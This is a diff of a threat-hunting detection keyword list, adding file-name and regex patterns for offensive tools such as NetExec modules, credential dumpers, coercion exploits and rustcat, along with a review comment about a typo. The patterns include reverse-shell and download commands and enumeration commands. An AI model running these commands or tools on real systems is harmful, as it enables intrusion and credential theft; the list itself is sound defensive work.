@@ -6286,6 +6361,7 @@ *\Dendron.bin* *\Dendron.exe* *\Dendron.sln* +*\dfscoerce.py* *\DInjector.sln* *\DInjector\* *\dist\sigthief.exe* @@ -6301,6 +6377,7 @@ *\donut.exe* *\donut\VanillaProgram.bin* *\Doraemon* +*\drop-sc.py* *\duedlligence.dll* *\dumper.ps1* *\dumpert.* @@ -6319,8 +6396,11 @@ *\Elite.csproj* *\Elite.sln* *\emailall.py* +*\empire_exec.py* *\enc_shellcode.bin* *\enc_shellcode.h* +*\enum_av.py* +*\enum_dns.py* *\ES.Alan.Core* *\EternalHushCore.dll* *\EternalHushCore\* @@ -6346,6 +6426,7 @@ *\Fertliser.exe* *\Fertliser.pdb* *\Files\ContainersFileUrls.txt* +*\find-computer.py* *\follina.py* *\FreeFileSync.exe* *\FreeFileSync\Logs\* @@ -6354,7 +6435,9 @@ *\freeze.go *\FtpC2\* *\FudgeC2* +*\get_netconnections.py* *\GetBrowsers.ps1* +*\get-desc-users.py* *\Get-SpoolStatus.ps1* *\GetWebDAVStatus\ *\GetWebDAVStatus_x64* @@ -6371,15 +6454,21 @@ *\go-secdump* *\goZulipC2* *\GPOddity\* +*\gpp_autologin.py* +*\gpp_password.py* +*\group_members.py* *\Group3r.exe* *\Grouper2.exe* +*\groupmembership.py* *\GzipB64.exe* *\HackBrowserData* *\Hades.exe* *\hades.exe* *\hades-main.zip* *\handlekatz.exe* +*\handlekatz.py* *\harvest.cmb* +*\hash_spider.py* *\hashview.py* *\HiddenDesktop\* *\hijackers\* @@ -6401,6 +6490,7 @@ *\IDiagnosticProfileUAC* *\iis_controller.py* *\impacket.* +*\impersonate.py* *\Implant.exe * *\implant.exe *.exe *\ImplantSSP.exe* @@ -6408,9 +6498,11 @@ *\inceptor.py* *\injector.ps1 1 * *\injector.ps1 2 * +*\install_elevated.py* *\Inveigh.exe* *\inveigh.exe* *\Inveigh\bin\* +*\IOXIDResolver.py* *\IPfuscation.cpp* *\IPfuscation.exe* *\ipscan-*-setup.exe* @@ -6423,6 +6515,8 @@ *\JunctionFolder.csproj* *\katz.ps1* *\kdstab.exe* +*\keepass_discover.py* +*\keepass_trigger.py* *\KeeTheft.exe* *\kerberoast.c* *\KernelTokens.sys* @@ -6440,8 +6534,10 @@ *\Ladon.exe* *\Ladon.ps1* *\lansearch.exe* +*\laps.py* *\LAPSDumper\* *\ldap_search_bof.py* +*\ldap-checker.py* *\LibSnaffle* *\Loader\Loader.csproj* *\local_admins.csv* 
@@ -6452,18 +6548,22 @@ *\lsass.dmp* *\LSASSProtectionBypass\* *\LsassSilentProcessExit* +*\lsassy_dump.py* *\m3-gen.py* *\MaccaroniC2* +*\MachineAccountQuota.py* *\macoffe.pdb* *\malseclogon.* *\MalStuff.cpp* *\malware_runner.py* *\manspider_*.log* +*\masky.py* *\master\GPSCoordinates\* *\Mayhem.psm1* *\megatools-*-win64\* *\megatools.exe* *\mem_dll.pdb* +*\met_inject.py* *\mhydeath64* *\mimi32.exe* *\mimi64.exe* @@ -6472,17 +6572,29 @@ *\monkey.exe * *\monkey32.exe* *\monkey64.exe* +*\ms17-010.py* *\Mshikaki.cpp* +*\msi_search.c* +*\msi_search.exe* +*\msi_search.ps1* +*\msi_search.x64.o* +*\msi_search.x86.o* +*\msol.py* *\MSOL\DomainCompanyInfo.txt* +*\mssql_priv.py* *\mystikal.py* *\nanodump* +*\nanodump.py* *\net*\ftpagent.exe* *\net.exe" accounts* *\net.exe* localgroup admin* *\net.exe* sessions* *\net.exe* view */domain* *\net1 sessions* +*\netexec.py* +*\netexec.yml* *\NetExec-main* +*\NetExec-main\* *\NetLoader.exe* *\netscan.exe* *\netscan.exe* @@ -6503,6 +6615,7 @@ *\NoFilter.sln* *\NoFilter.vcxproj* *\nopac.exe* +*\nopac.py* *\NoPowerShell* *\NoPowerShell.* *\No-PowerShell.cs* @@ -6513,13 +6626,18 @@ *\NPPSpy.txt* *\ntdlll-unhooking-collection* *\ntdlol.txt* +*\ntdsutil.py* *\ntlm.py* *\NTLMRelay2Self* *\ntlmutil.py* +*\ntlmv1.py* *\NtoskrnlOffsets.csv* *\NtRemoteLoad.sln* *\NtRights\* *\Nuages_Cli* +*\nxc.exe* +*\nxc\parsers\ip.py* +*\nxc\parsers\nmap.py* *\obfy-1.0.zip* *\OffensiveCSharp\* *\out_pe.exe* @@ -6527,6 +6645,7 @@ *\papacat.ps1* *\papacat.zip* *\ParsedMalleableData.txt* +*\parsers\nessus.py* *\password.lst* *\Passwordfiles.txt* *\PatchingAPI.cpp* @@ -6536,6 +6655,7 @@ *\PerfExec.exe* *\Persistence.cpp* *\Persistence.exe* +*\petitpotam.py* *\pipe\brutepipe* *\PipeViewer.exe* *\PipeViewer.sln* @@ -6567,11 +6687,13 @@ *\PPLBlade-main* *\PPLFault* *\PPLKiller* +*\printnightmare.py* *\PrintSpoofer.cs* *\PrintSpoofer-1.0.zip* *\PrivEditor\* *\PrivescCheck* *\PrivKit\* +*\procdump.py* *\Process Hacker 2\* *\process_killer.cpp* *\ProduKey.exe* 
@@ -6598,6 +6720,9 @@ *\RasmanPotato* *\ratchatPT.go* *\ratchatPT.syso* +*\rcat-v*-win-x86_64.exe* +*\rdcman.py* +*\rdp.py* *\RDPCredsStealerDLL* *\RealTimeSync.exe* *\Reaper\Reaper.cpp* @@ -6609,6 +6734,7 @@ *\RedPersist.pdb* *\RedPersist.sln* *\RedPersist-main\* +*\reg-query.py* *\RemoteCamera.dll* *\Resources\Disks-NoEncryption.txt* *\resources\PROCEXP.sys* @@ -6625,6 +6751,7 @@ *\run\john\*.pl* *\run\john\*.py* *\RunasCs.cs* +*\runasppl.py* *\RunBOF.exe* *\RunOF.exe* *\RunOF\bin\* @@ -6633,6 +6760,7 @@ *\samantha.txt *\save_reg.hive* *\scanACLsResults.csv* +*\scan-network.py* *\scmuacbypass.cpp* *\scmuacbypass.exe* *\SCMUACBypass\* @@ -6645,6 +6773,7 @@ *\ScriptSentry.psd1* *\ScriptSentry.psm1* *\ScriptSentry.txt* +*\scuffy.py* *\Seatbelt.txt* *\Seatbelt\Commands\* *\ServerC2.cpp* @@ -6656,6 +6785,7 @@ *\SessionSearcher.csproj* *\SessionSearcher.exe* *\shadowcoerce.py* +*\shadowcoerce.py* *\ShadowSpray\*.cs* *\Sharefinder.ps1* *\SharpAzbelt.csproj* @@ -6687,6 +6817,7 @@ *\SimpleLoader.cpp* *\SimpleLoader.exe* *\sitadel.log* +*\slinky.py* *\SMB_RPC\*.py *\smuggler.py* *\sniff.py* @@ -6695,7 +6826,9 @@ *\spellbound-main* *\spellgen.py * *\spellstager.py * +*\spider_plus.py* *\SpoofCmdLine\TheThing* +*\spooler.py* *\SprayAD.cna* *\SprayAD.exe* *\SQLInfoDumps* @@ -6713,6 +6846,7 @@ *\systemic.txt *\TakeMyRDP* *\TASKSHELL.EXE* +*\teams_localdb.py* *\teamserver-win.zip* *\teamstracker.py* *\Temp\*\ntds.dit* @@ -6747,6 +6881,7 @@ *\Tor\torrc* *\TorBrowser* *\TrustExec.exe* +*\uac.py* *\UACME-*.zip* *\uberfile.py* *\unDefender.exe* @@ -6766,6 +6901,7 @@ *\uTorrent\* *\utweb.exe* *\UUID_bypass.py* +*\veeam_dump.py* *\wce32.exe* *\wce64.exe* *\wce-beta.zip* @@ -6774,11 +6910,15 @@ *\wdextract.vcxproj* *\wdextract32.exe* *\wdextract64.exe* +*\wdigest.py* *\WdigestOffsets.csv* +*\web_delivery.py* +*\webdav.py* *\WfpTokenDup.exe* *\whatlicense-main\* *\WheresMyImplant* *\while_dll_ms* +*\whoami.py* *\Windows\Prefetch\PSEXEC* *\Windows\Tasks\Certipy* *\Windows\Tasks\p4yl0ad* 
@@ -6789,7 +6929,9 @@ *\WindowsShareFinder.cs* *\Win-PS2EXE* *\WinRing0x64.sys* +*\winscp_dump.py* *\WiperPoc.cpp* +*\wireless.py* *\wl_log.txt* *\wl-lic.exe* *\wl-lic.pdb* @@ -6810,6 +6952,7 @@ *\XOR_b64_encrypted\* *\xorencrypt.py* *\ysoserial\* +*\zerologon.py* *] Eventviewer Persistence created* *] Extension Hijacking Persistence created* *] Found non-ASCII service: * @@ -7322,6 +7465,7 @@ *Add-Exfiltration.ps1* *Add-KeePassConfigTrigger* *AddKeePassTrigger.ps1* +*AddKeePassTrigger.ps1* *Add-MpPreference -ExclusionPath * *Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe* *Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All* @@ -7605,6 +7749,7 @@ *arp.spoof on* *arp.spoof.* *arp.spoof.targets* +*arp_mitm.py* *arp_spoof.* *arpspoof -i * *ArpSpoofer* @@ -7825,6 +7970,7 @@ *B374K*index.php* *b3rito*yodo* *b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94* +*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB* *b4ldr/nse-scripts* *b4rtik/RedPeanut* *b4rtik/RedPeanut* @@ -8169,6 +8315,7 @@ *bkeylogger* *bkkgdjpomdnfemhhkalfkogckjdkcjkg* *bks2john.py* +*blackarch/tree/master/packages/rustcat* *blackarrowsec/mssqlproxy* *blackarrowsec/pivotnacci* *blackhat-arsenal-tools* @@ -8768,6 +8915,7 @@ *ChaitanyaHaritash/kimi* *chameleon.py * *changepasswd.py* +*change-windows10-mac-address.py* *charlesnathansmith/whatlicense* *charles-proxy* *charlotte-main.zip* @@ -10193,6 +10341,7 @@ *EasyHook-Managed/LocalHook.cs* *EasyPersistent.cna* *Ebowla-master.zip* +*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052* *echo * .bash_history* *echo * /home/*/.bash_history* *echo * /root/.bash_history* @@ -10495,6 +10644,8 @@ *exec /bin/sh 0&0 2>&0* *exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done* *exec CMD=/bin/sh -f elf -o *.elf* +*Exec_Command_Silent.vbs* +*Exec_Command_WithOutput.vbs* *exec_payload_msi* *exec_shellcode.rb* *ExecCmdImplant* 
@@ -11874,7 +12025,9 @@ *hook-lsassy.py* *hook-lsassy.py* *hook-lsassy.py* +*hook-lsassy.py* *hook-pypsrp.py* +*hook-pypykatz.py* *HOST/EXEGOL-01.* *Host: FUZZ.machine.org* *HostEnum.ps1* @@ -12775,7 +12928,9 @@ *Invoke-noPac.* *Invoke-NTLMAuth.ps1* *Invoke-Ntsd.ps1* +*Invoke-Obfuscation -ScriptPath * *Invoke-Obfuscation* +*Invoke-Obfuscation.psd1* *Invoke-OpenInboxFinder* *Invoke-OpenOWAMailboxInBrowser* *Invoke-OxidResolver* @@ -12867,6 +13022,7 @@ *Invoke-PSImage* *Invoke-PSInject* *Invoke-PSInject.ps1* +*Invoke-PSInject.ps1* *Invoke-PsUACme* *Invoke-PsUACme* *Invoke-PsUACme* @@ -13692,6 +13848,7 @@ *lan_sw_port_scan.json* *lanjelot* *LANs.py* +*lanscan_arp.py* *lansearch.exe * *lansearchpro_portable.zip* *lansearchpro_setup.exe* @@ -14146,6 +14303,7 @@ *manager/mRemoteNG.py* *mandiant/DueDLLigence* *mandiant/gocrack* +*mandiant/msi-search* *mandllinject * *manspider * -d * -u * -p * *manspider */24 -f * @@ -14549,9 +14707,11 @@ *Mshikaki-main* *mshta/shellcode_inject* *MSHTAStager* +*msi-search-main.zip* *msLDAPDump.py* *MSOfficeManipulator.cs* *msol_dump* +*msol_dump.ps1* *MSOLSpray * *MSOLSpray.git* *MSOLSpray.ps1* @@ -14742,9 +14902,19 @@ *nessus-updates*.tar.gz* *net domain_controllers* *net group "Domain Admins" /domain* +*net group *Account Operators* /domain* +*net group *Backup Operators* /domain* *net group *domain admins* /domain* +*net group *Domain Computers* /domain* +*net group *Domain Controllers* /domain* *net group *Domain Controllers*/domain* *net group *Enterprise Admins* /dom* +*net group *Enterprise Admins* /domain* +*net group *Exchange Trusted Subsystem* /domain* +*net group *Microsoft Exchange Servers* /domain* +*net group *Print Operators* /domain* +*net group *Schema Admins* /domain* +*net group *Server Operators* /domain* *net group / domain *Domain Admins* *net group /domain *Domain Admins* *net group administrators /domain* 
@@ -14759,6 +14929,16 @@ *net user john H4x00r123* *net view /all /domain* *net* group Administrator* /add /domain* +*net.exe* group *Account Operators* /domain* +*net.exe* group *Backup Operators* /domain* +*net.exe* group *Domain Computers* /domain* +*net.exe* group *Domain Controllers* /domain* +*net.exe* group *Enterprise Admins* /domain* +*net.exe* group *Exchange Trusted Subsystem* /domain* +*net.exe* group *Microsoft Exchange Servers* /domain* +*net.exe* group *Print Operators* /domain* +*net.exe* group *Schema Admins* /domain* +*net.exe* group *Server Operators* /domain* *net.fuzz * *net.fuzz.* *net.probe on @@ -14781,7 +14961,27 @@ *net_localgroup_member -Group* *net_portscan.py* *net_recon.* +*net1 group *Account Operators* /domain* +*net1 group *Backup Operators* /domain* +*net1 group *Domain Computers* /domain* +*net1 group *Domain Controllers* /domain* +*net1 group *Enterprise Admins* /domain* +*net1 group *Exchange Trusted Subsystem* /domain* +*net1 group *Microsoft Exchange Servers* /domain* +*net1 group *Print Operators* /domain* +*net1 group *Schema Admins* /domain* +*net1 group *Server Operators* /domain* *net1 localgroup admin* +*net1.exe* group *Account Operators* /domain* +*net1.exe* group *Backup Operators* /domain* +*net1.exe* group *Domain Computers* /domain* +*net1.exe* group *Domain Controllers* /domain* +*net1.exe* group *Enterprise Admins* /domain* +*net1.exe* group *Exchange Trusted Subsystem* /domain* +*net1.exe* group *Microsoft Exchange Servers* /domain* +*net1.exe* group *Print Operators* /domain* +*net1.exe* group *Schema Admins* /domain* +*net1.exe* group *Server Operators* /domain* *netCat* *net-creds* *netdiscover -i * -r */24* @@ -14793,6 +14993,7 @@ *NetExec ldap * -M enum_trusts* *NetExec winrm *--* *NetExec-main.zip* +*NetExec-main.zip* *Net-GPPPassword.cs* *Net-GPPPassword.exe* *Net-GPPPassword_dotNET* 
@@ -14923,6 +15124,8 @@ *nmap -Pn -v -sS -F* *nmap-*-setup.exe* *nmap/ncrack* +*nmap_port_scanner.py* +*nmap_port_scanner_ip_obj.py* *nmap_smb_scan_custom_*.txt* *nmapAnswerMachine.py* *nmap-elasticsearch-nse* @@ -15082,6 +15285,8 @@ *nxc mssql *--local-auth* *nxc ssh * *nxc winrm * -X * +*nxc*nxcdb.py* +*nxcdb-zipapp-* *nysm.skel.h* *nysm-master.zip* *nyxgeek* @@ -15324,6 +15529,7 @@ *package=impacket* *PackMyPayload.py* *PackMyPayload-master* +*pacman -S rustcat* *pacu --exec * *pacu --list-modules* *pacu --module-args=* @@ -15702,6 +15908,8 @@ *pornhub.py* *port and pasv both active* *port_forward_pivot.py* +*port_scanner_ip_obj.py* +*port_scanner_regex.py* *PortBender backdoor* *PortBender redirect* *PortBender.cna* @@ -16257,6 +16465,7 @@ *pwn_jenkins* *pwn1sher/CS-BOFs* *pwn1sher/WMEye* +*pwn3d_label = Pwn3d!* *pwnagotchi* *pwnat.exe* *pwncat-cs *:* @@ -16305,6 +16514,7 @@ *pyherion.py* *pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh* *pyinstaller *.py* +*pyinstaller netexec.spec* *pyinstaller.exe* *pyinstaller/tarball* *pyinstaller-script.py* @@ -16563,6 +16773,15 @@ *RBCD_Petitpotam_VulnerableServers.txt* *rbsec/dnscan* *rc4.py *.bin* +*rcan listen -ib * +*rcat c -s bash * +*rcat connect -s bash* +*rcat listen 55660* +*rcat listen -ie * +*rcat listen -l * +*rcat-v3.*darwin-aarch64* +*rcat-v3.*-darwin-x86_64* +*rcat-v3.*-linux-x86_64* *RCE-exploits* *rclone copy *:* *rclone.exe config create remote mega user * @@ -16820,6 +17039,7 @@ *Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt* *Remove-KeePassConfigTrigger* *RemoveKeePassTrigger.ps1* +*RemoveKeePassTrigger.ps1* *remove-persistence* *Remove-Persistence.ps1* *remove-persistence-cron* @@ -16854,6 +17074,7 @@ *responder-smb-on* *Responder-Windows* *RestartKeePass.ps1* +*RestartKeePass.ps1* *restic2john.py* *restore_signature.sh *.dmp* *RestrictedAdmin.exe* 
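Review bot: `*rcan listen -ib *` in the hunk at `@@ -16563,6 +16773,15 @@` looks like a typo, since every neighbouring entry spells the binary `rcat`. As written this keyword would presumably never fire on the command it was meant to catch, and it should likely read `*rcat listen -ib *`. In the same hunk `*rcat listen 55660*` pins one literal port and so only matches when that exact number is used, while the `rcat listen *` entry added in the last hunk of this file already covers the general form. The `rcan` spelling should also be checked in the CSV source and in only_keywords_regex.txt, whose matching hunk is outside this view.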
@@ -17119,6 +17340,7 @@ *RuralBishop.sln* *RuralBishop-master* *rustbof.cna* +*rustcat-3.0.0.zip* *rusthound * --zip --ldaps --adcs --old-bloodhound* *rusthound *--domain* *rusthound *--ldapfqdn * @@ -17297,6 +17519,7 @@ *scshellbof.o* *scshellbofx64* *scumjr*dirtycow-vdso* +*Search cached MSI files in C:/Windows/Installer/* *search_for_secrets(* *Search-cpassword* *SearchOutlook.exe* @@ -18674,6 +18897,7 @@ *targetver.h* *tarunkant/Gopherus* *tas389.ps1* +*taskkill /F /T /IM keepass.exe /FI* *tasklist /fi *Imagename eq lsass.exe* | find *lsass* *tasklist /svc | findstr /i "vmtoolsd.exe"* *TaskShell.exe * -b *.exe* @@ -19207,6 +19431,8 @@ *vectra-ai-research/MAAD-AF* *veeam_credential_dump.* *veeam_dump* +*veeam_dump_mssql.ps1* +*veeam_dump_postgresql.ps1* *Vegile -* *venv wapiti3* *Verified Merlin server * @@ -19402,6 +19628,8 @@ *WhoamiGetTokenInfo* *wifi/airpwn* *wifi/dnspwn* +*wifi_dos_own.py* +*wifi_dos3.py* *wifi_dump_linux* *wifi_fake_auth.* *WiFi_Hacker.ino* @@ -19797,6 +20025,7 @@ *Yay! No SYSMON here!* *YDHCUI/csload.net* *YDHCUI/manjusaka* +*yeelight_discover.py* *Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC* *ylAo2kAlUS2kYkala!* *Yml0c3kubWl0LmVkdQ==* @@ -19999,6 +20228,7 @@ pupysh python3 start_campaign.py raw_keylogger * rawshark -* +rcat listen * RedGuard -* remotereg * rev2self* diff --git a/only_keywords_regex.txt b/only_keywords_regex.txt index 0ffc6a8f3..2b6bbe1ad 100644 --- a/only_keywords_regex.txt +++ b/only_keywords_regex.txt @@ -2604,6 +2604,7 @@ .*/\.manspider/loot.* .*/\.msf4/.* .*/\.ntdissector.* +.*/\.nxc/obfuscated_scripts/.* .*/\.sliver/logs.* .*/\.ssh/RAI\.pub.* .*//:ptth.* @@ -2646,6 +2647,7 @@ .*/ADACLScanner\.git.* .*/adalanche/modules/.* .*/adconnectdump\.git.* +.*/adcs\.py.* .*/adcs_enum/.* .*/adcs_request/adcs_request\..* .*/adcs_request/CertCli\..* @@ -2654,6 +2656,7 @@ .*/adcs-enum\.py.* .*/ADCSKiller.* .*/ADCSPwn\.git.* +.*/add_computer\.py.* .*/add_groupmember\.py.* .*/address-info\.nse.* .*/AddUser-Bof\..* 
@@ -2885,13 +2888,16 @@ .*/BesoToken\.exe.* .*/BesoToken\.git.* .*/bettercap.* +.*/bh_owned\.py.* .*/bhqc\.py -.* .*/BIFFRecordEncryption\.cs.* .*/bin/0d1n.* .*/bin/AceLdr.* +.*/bin/bash -c 'bash -i >& /dev/tcp/.*/.* 0>&1'.* .*/bin/fake-sms.* .*/bin/gorsair .* .*/bin/hakrawler.* +.*/bin/nxcdb.* .*/bin/posh.* .*/bin/pupysh.* .*/bin/read_i\.php\?a1=step2-down-b&a2=.* @@ -3307,6 +3313,7 @@ .*/D1rkInject\.git.* .*/d4em0n/exrop.* .*/daap-get-library\.nse.* +.*/daclread\.py.* .*/DAMP\.git.* .*/DanMcInerney/ridenum.* .*/daphne\.git.* @@ -3322,6 +3329,7 @@ .*/data/auxiliary/gather.* .*/data/empire\.db.* .*/data/exploits/.* +.*/data/nxc\.conf.* .*/data/shellcode.* .*/DavRelayUp\.git.* .*/DavRelayUp/.* @@ -3375,6 +3383,7 @@ .*/detect-hooks\.h.* .*/Detect-Hooks/.* .*/DFSCoerce\.git.* +.*/dfscoerce\.py.* .*/dhcp-discover\.nse.* .*/Dialogs/Payload\.hpp.* .*/dicom-brute\.nse.* @@ -3480,6 +3489,7 @@ .*/drda-brute\.nse.* .*/drda-info\.nse.* .*/Drones/SleepDialogue\.razor.* +.*/drop-sc\.py.* .*/drunkpotato.* .*/dsniff\.c.* .*/dsniff\.services.* @@ -3535,6 +3545,7 @@ .*/Empire\.git .*/empire/client/.* .*/empire:latest.* +.*/empire_exec\.py.* .*/EmpireProject.* .*/enable-user\.py.* .*/enableuser/enableuser\.x64\..* @@ -3545,7 +3556,9 @@ .*/enum__secrets/.*\.py.* .*/enum_av\.md.* .*/enum_av\.py.* +.*/enum_av\.py.* .*/enum_cisco\.md.* +.*/enum_dns\.py.* .*/enum_domain_info.* .*/enum_f5\.md.* .*/enum_juniper\.md.* @@ -3653,6 +3666,7 @@ .*/FilelessPELoader.* .*/final_shellcode_size\.txt.* .*/find_domain\.sh.* +.*/find-computer\.py.* .*/FindModule\.c.* .*/FindObjects\.cna.* .*/FindSQLSrv\.py.* @@ -3720,6 +3734,7 @@ .*/Gemail-Hack\.git.* .*/GetBrowsers\.ps1.* .*/get-clipboard\.py.* +.*/get-desc-users\.py.* .*/getLegit/cdnl.* .*/getLegit/grkg.* .*/getLegit/prvw.* @@ -3864,6 +3879,8 @@ .*/goZulipC2\.git.* .*/GPOddity\.git.* .*/GPOddity/.* +.*/gpp_autologin\.py.* +.*/gpp_password\.py.* .*/gpp-decrypt.* .*/gpsd-info\.nse.* .*/GreatSCT/.* 
@@ -3895,9 +3912,11 @@ .*/Hak5\.sh.* .*/hakrawler\.git.* .*/hancitor\.profile.* +.*/handlekatz\.py.* .*/HandleKatz_BOF.* .*/HarmJ0y.* .*/HaryyUser\.exe.* +.*/hash_spider\.py.* .*/hashcat.* .*/hashdump_dc.* .*/Hashi0x/.* @@ -4122,6 +4141,7 @@ .*/imfiver/CVE-2022-0847.* .*/impacket\..* .*/impacket/.* +.*/impersonate\.py.* .*/impersonate-rs.* .*/imperun .* .*cmd\.exe /c whoami.* .*/Imperva_gzip_WAF_Bypass.* @@ -4173,6 +4193,7 @@ .*/instabrute\.py.* .*/instainsane\.git.* .*/instainsane\.sh.* +.*/install_elevated\.py.* .*/install-sb\.sh.* .*/insTof\.py.* .*/interactive_shell\.py.* @@ -4189,6 +4210,7 @@ .*/Invoke-HostEnum\.ps1.* .*/Invoke-RunAs\.ps1.* .*/Invoke-SMBRemoting\.git.* +.*/IOXIDResolver\.py.* .*/ip_spoof\.rb.* .*/IPayloadService\..* .*/ip-forwarding\.nse.* @@ -4261,7 +4283,9 @@ .*/kdstab\..* .*/KDStab\..* .*/KDStab/.* +.*/keepass_discover\.py.* .*/keepass_discover_.*\.txt.* +.*/keepass_trigger\.py.* .*/KeeThief\.git.* .*/kerberoast\..* .*/kerberoast\.c.* @@ -4325,6 +4349,7 @@ .*/lansearch\.exe.* .*/laps\.py .*--ldapserver.* .*/laps\.py .*-u .* -p .* +.*/laps\.py.* .*/laps_dump_.*\.txt.* .*/LAPSDumper\.git.* .*/lastpass\.py.* @@ -4337,6 +4362,7 @@ .*/ldap_injection\.txt.* .*/ldap_search_bof\.py.* .*/ldap-brute\.nse.* +.*/ldap-checker\.py.* .*/ldap-novell-getpass\.nse.* .*/LdapRelayScan\.git.* .*/ldap-rootdse\.nse.* @@ -4398,6 +4424,7 @@ .*/LSASSProtectionBypass/CredGuard\.c.* .*/LsassSilentProcessExit\.git.* .*/lsassy.* +.*/lsassy_dump\.py.* .*/lucksec/CVE-2022-0847.* .*/lu-enum\.nse.* .*/luijait/arpspoofing.* @@ -4436,6 +4463,7 @@ .*/manspider_.*\.log.* .*/manspider_output.*\.txt .*/manspiderDump.* +.*/masky\.py.* .*/master/GPSCoordinates/.* .*/master/JunctionFolder/.* .*/master/PhantomService/.* @@ -4455,6 +4483,7 @@ .*/merlin\.js.* .*/merlin\.py.* .*/merlin/agent_code/.* +.*/met_inject\.py.* .*/Metasploit.* .*/metasploit/.* .*/metasploit-framework/embedded/framework.* 
@@ -4525,6 +4554,7 @@ .*/Mr-Un1k0d3r/.* .*/Mr-xn/cve-2022-23131.* .*/MS15-034\.nse.* +.*/ms17-010\.py.* .*/msf\.go .*/msf\.swf.* .*/msfcrawler.* @@ -4536,9 +4566,13 @@ .*/Mshikaki\.git.* .*/mshta\.cmd.* .*/mshtajs\.cmd.* +.*/msi_search\.ps1.* +.*/msi-search\.git.* .*/msLDAPDump.* +.*/msol\.py.* .*/MSOLSpray.* .*/msrpc-enum\.nse.* +.*/mssql_priv\.py.* .*/ms-sql-brute\.nse.* .*/ms-sql-config\.nse.* .*/ms-sql-dac\.nse.* @@ -4581,6 +4615,7 @@ .*/n1nj4sec/pupy.* .*/nanodump.* .*/nanodump\..* +.*/nanodump\.py.* .*/nanorobeus\.git.* .*/nanorubeus/.* .*/Native/SigFlip/.* @@ -4612,6 +4647,7 @@ .*/netbus-version\.nse.* .*/netcreds\.py.* .*/NetExec\.git.* +.*/netexec\.py.* .*/NetExec-main.* .*/Net-GPPPassword\.git.* .*/nethunter-images/.* @@ -4680,6 +4716,7 @@ .*/NoFilter\.sln.* .*/NoFilter\.vcxproj.* .*/nopac\.exe +.*/nopac\.py.* .*/No-PowerShell\.cs.* .*/No-PowerShell\.exe.* .*/nopowershell\.git.* @@ -4702,6 +4739,7 @@ .*/NTDLLReflection\.git.* .*/NtdllUnpatcher\.git.* .*/ntds_dump_.*\.txt.* +.*/ntdsutil\.py.* .*/ntlm\.py.* .*/ntlmquic.* .*/NTLMRecon.* @@ -4716,6 +4754,7 @@ .*/ntlmutil\.py.* .*/ntlmutil\.py.* .*/ntlmv1\.py.* +.*/ntlmv1\.py.* .*/ntp-info\.nse.* .*/ntp-monlist\.nse.* .*/NtQuerySystemInformation\.md.* @@ -4726,6 +4765,10 @@ .*/Nuages_Cli.* .*/nuagesAPI\.js.* .*/nxc --help.* +.*/nxc\.exe.* +.*/nxc/parsers/ip\.py.* +.*/nxc/parsers/nmap\.py.* +.*/nxc-ubuntu-latest.* .*/nysm bash.* .*/nysm -dr socat TCP4-LISTEN.* .*/nysm -r ssh .*@.* @@ -4818,6 +4861,7 @@ .*/parrot-on-docker/.* .*/parrotsec/.* .*/ParsedMalleableData\.txt.* +.*/parsers/nessus\.py.* .*/pass_gen\.pl.* .*/PassDetective\.git.* .*/passhash\.sl.* @@ -4868,6 +4912,7 @@ .*/persistence2\.rc.* .*/peterspbr/dirty-pipe-otw.* .*/PetitPotam\.git.* +.*/petitpotam\.py.* .*/PEzor\.cna.* .*/PEzor\.git.* .*/PEzor\.sh .* @@ -4960,6 +5005,7 @@ .*/printerbug\.py.* .*/PrintMonitorDll\..* .*/PrintMonitorDll/.* +.*/printnightmare\.py.* .*/PrintSpoofer\.git.* .*/PrintSpoofer\.git.* .*/PrintSpoofer/.* 
@@ -4974,6 +5020,7 @@ .*/PrivKit\.git.* .*/PrivKit/.* .*/proberbyte\.go.* +.*/procdump\.py.* .*/process_herpaderping/.* .*/process_killer\.cpp.* .*/processhacker-.*-bin\.zip.* @@ -5103,9 +5150,12 @@ .*/rawrpc\.py.* .*/RC4BinaryEncryption\.cs.* .*/RC4Payload32\.txt.* +.*/rcat-v.*-win-x86_64\.exe.* .*/RCStep/CSSG/.* +.*/rdcman\.py.* .*/RDE1\.git.* .*/rdll_template.* +.*/rdp\.py.* .*/RDPassSpray\.git.* .*/RDPCredentialStealer\.git.* .*/rdp-enum-encryption\.nse.* @@ -5150,6 +5200,7 @@ .*/reGeorg\.git.* .*/RegistryPersistence\.c.* .*/Registry-Recon/.* +.*/reg-query\.py.* .*/regreeper\.jpg.* .*/Reg-Restore-Persistence-Mole.* .*/regsvcs/meterpreter.* @@ -5241,6 +5292,7 @@ .*/RunasCs\.git.* .*/RunasCs\.git.* .*/RunasCs\.zip.* +.*/runasppl\.py.* .*/RunAsWinTcb\.git.* .*/RunAsWinTcb\.iml.* .*/runcalc\.dll.* @@ -5250,6 +5302,7 @@ .*/runshellcode\..* .*/RuralBishop\.git.* .*/rusers\.nse.* +.*/rustcat/releases/latest/download/.* .*/rusthound\.exe.* .*/RustHound\.git.* .*/rvrsh3ll/.* @@ -5278,6 +5331,7 @@ .*/scanner/portscan.* .*/scanner/winrm.* .*/scannerPort\.go.* +.*/scan-network\.py.* .*/Scans/servers_all_smb.*\.txt.* .*/ScareCrow -I .* .*/sccmhunter.* @@ -5295,6 +5349,7 @@ .*/ScRunHex\.py.* .*/scshell.* .*/scshell\.py.* +.*/scuffy\.py.* .*/searchsploit.* .*/Seatbelt\.txt.* .*/Seatbelt/Commands.* @@ -5333,6 +5388,7 @@ .*/sh_executor/.*\.go.* .*/s-h-3-l-l/.* .*/shadowcoerce\.py.* +.*/shadowcoerce\.py.* .*/ShadowForgeC2.* .*/ShadowSpray\.git.* .*/ShadowSpray/.*\.cs.* @@ -5461,6 +5517,7 @@ .*/sleep_python_bridge/.* .*/Sleeper/Sleeper\.cna.* .*/sleepmask\.cna.* +.*/slinky\.py.* .*/SlinkyCat\.git.* .*/sliver\.git.* .*/sliver\.pb\.go.* @@ -5574,6 +5631,7 @@ .*/spellgen\.py .* .*/spellstager\.py .* .*/spider\.yaml.* +.*/spider_plus\.py.* .*/SpiderFoot-.*\.log\.cs.* .*/SpiderFoot\.csv.* 